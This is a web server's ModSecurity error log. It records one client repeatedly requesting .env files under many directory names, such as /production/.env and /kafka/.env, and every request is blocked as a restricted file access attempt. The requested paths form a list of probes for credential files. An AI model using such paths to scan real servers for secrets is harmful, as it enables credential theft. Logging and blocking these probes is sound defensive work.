[Mon May 11 18:03:42.476197 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/rabbitmq/.env"] [unique_id "agH93kWKUxpmnkK7zHyiewAAAQ4"]
[Mon May 11 18:03:42.476607 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH93kWKUxpmnkK7zHyiewAAAQ4"]
[Mon May 11 18:03:42.641700 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kafka/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/kafka/.env"] [unique_id "agH93kWKUxpmnkK7zHyifAAAAQ4"]
[Mon May 11 18:03:42.641956 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/kafka/.env"] [unique_id "agH93kWKUxpmnkK7zHyifAAAAQ4"]
[Mon May 11 18:03:42.642272 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH93kWKUxpmnkK7zHyifAAAAQ4"]
[Mon May 11 18:03:42.810501 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /queue/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/queue/.env"] [unique_id "agH93kWKUxpmnkK7zHyifgAAAQ4"]
[Mon May 11 18:03:42.810763 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/queue/.env"] [unique_id "agH93kWKUxpmnkK7zHyifgAAAQ4"]
[Mon May 11 18:03:42.811166 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH93kWKUxpmnkK7zHyifgAAAQ4"]
[Mon May 11 18:03:42.989959 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /worker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/worker/.env"] [unique_id "agH93kWKUxpmnkK7zHyifwAAAQ4"]
[Mon May 11 18:03:42.990221 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/worker/.env"] [unique_id "agH93kWKUxpmnkK7zHyifwAAAQ4"]
[Mon May 11 18:03:42.990539 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH93kWKUxpmnkK7zHyifwAAAQ4"]
[Mon May 11 18:03:43.566885 2026] [security2:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /job/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/job/.env"] [unique_id "agH930WKUxpmnkK7zHyigQAAAQY"]
[Mon May 11 18:03:43.567317 2026] [security2:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/job/.env"] [unique_id "agH930WKUxpmnkK7zHyigQAAAQY"]
[Mon May 11 18:03:43.568822 2026] [security2:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH930WKUxpmnkK7zHyigQAAAQY"]
[Mon May 11 18:03:43.749642 2026] [security2:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/test/.env"] [unique_id "agH930WKUxpmnkK7zHyiggAAAQY"]
[Mon May 11 18:03:43.749870 2026] [security2:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/test/.env"] [unique_id "agH930WKUxpmnkK7zHyiggAAAQY"]
[Mon May 11 18:03:43.750191 2026] [security2:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH930WKUxpmnkK7zHyiggAAAQY"]
[Mon May 11 18:03:43.925957 2026] [security2:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /qa/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/qa/.env"] [unique_id "agH930WKUxpmnkK7zHyihAAAAQY"]
[Mon May 11 18:03:43.926172 2026] [security2:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/qa/.env"] [unique_id "agH930WKUxpmnkK7zHyihAAAAQY"]
[Mon May 11 18:03:43.926474 2026] [security2:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH930WKUxpmnkK7zHyihAAAAQY"]
[Mon May 11 18:03:44.087889 2026] [security2:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /preview/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/preview/.env"] [unique_id "agH94EWKUxpmnkK7zHyihQAAAQY"]
[Mon May 11 18:03:44.088139 2026] [security2:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/preview/.env"] [unique_id "agH94EWKUxpmnkK7zHyihQAAAQY"]
[Mon May 11 18:03:44.088441 2026] [security2:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH94EWKUxpmnkK7zHyihQAAAQY"]
[Mon May 11 18:03:44.259991 2026] [security2:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /beta/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/beta/.env"] [unique_id "agH94EWKUxpmnkK7zHyihgAAAQY"]
[Mon May 11 18:03:44.260326 2026] [security2:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/beta/.env"] [unique_id "agH94EWKUxpmnkK7zHyihgAAAQY"]
[Mon May 11 18:03:44.260723 2026] [security2:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH94EWKUxpmnkK7zHyihgAAAQY"]
[Mon May 11 18:03:44.440371 2026] [security2:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uat/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/uat/.env"] [unique_id "agH94EWKUxpmnkK7zHyiiAAAAQY"]
[Mon May 11 18:03:44.440655 2026] [security2:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/uat/.env"] [unique_id "agH94EWKUxpmnkK7zHyiiAAAAQY"]
[Mon May 11 18:03:44.441025 2026] [security2:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH94EWKUxpmnkK7zHyiiAAAAQY"]
[Mon May 11 18:03:44.617319 2026] [security2:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/stage/.env"] [unique_id "agH94EWKUxpmnkK7zHyiiQAAAQY"]
[Mon May 11 18:03:44.617547 2026] [security2:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/stage/.env"] [unique_id "agH94EWKUxpmnkK7zHyiiQAAAQY"]
[Mon May 11 18:03:44.617855 2026] [security2:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH94EWKUxpmnkK7zHyiiQAAAQY"]
[Mon May 11 18:03:44.789477 2026] [security2:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/development/.env"] [unique_id "agH94EWKUxpmnkK7zHyiigAAAQY"]
[Mon May 11 18:03:44.789719 2026] [security2:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/development/.env"] [unique_id "agH94EWKUxpmnkK7zHyiigAAAQY"]
[Mon May 11 18:03:44.790024 2026] [security2:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH94EWKUxpmnkK7zHyiigAAAQY"]
[Mon May 11 18:03:44.976089 2026] [security2:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /production/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/production/.env"] [unique_id "agH94EWKUxpmnkK7zHyiiwAAAQY"]
[Mon May 11 18:03:44.976346 2026] [security2:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/production/.env"] [unique_id "agH94EWKUxpmnkK7zHyiiwAAAQY"]
[Mon May 11 18:03:44.976661 2026] [security2:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH94EWKUxpmnkK7zHyiiwAAAQY"]
[Mon May 11 18:03:45.143685 2026] [security2:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/config/app/.env"] [unique_id "agH94UWKUxpmnkK7zHyijQAAAQY"]
[Mon May 11 18:03:45.143950 2026] [security2:error] [pid 1411055:tid 1411063] [client 54.67.78.1:45628] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/config/app/.env"] [unique_id "agH94UWKUxpmnkK7zHyijQAAAQY"]
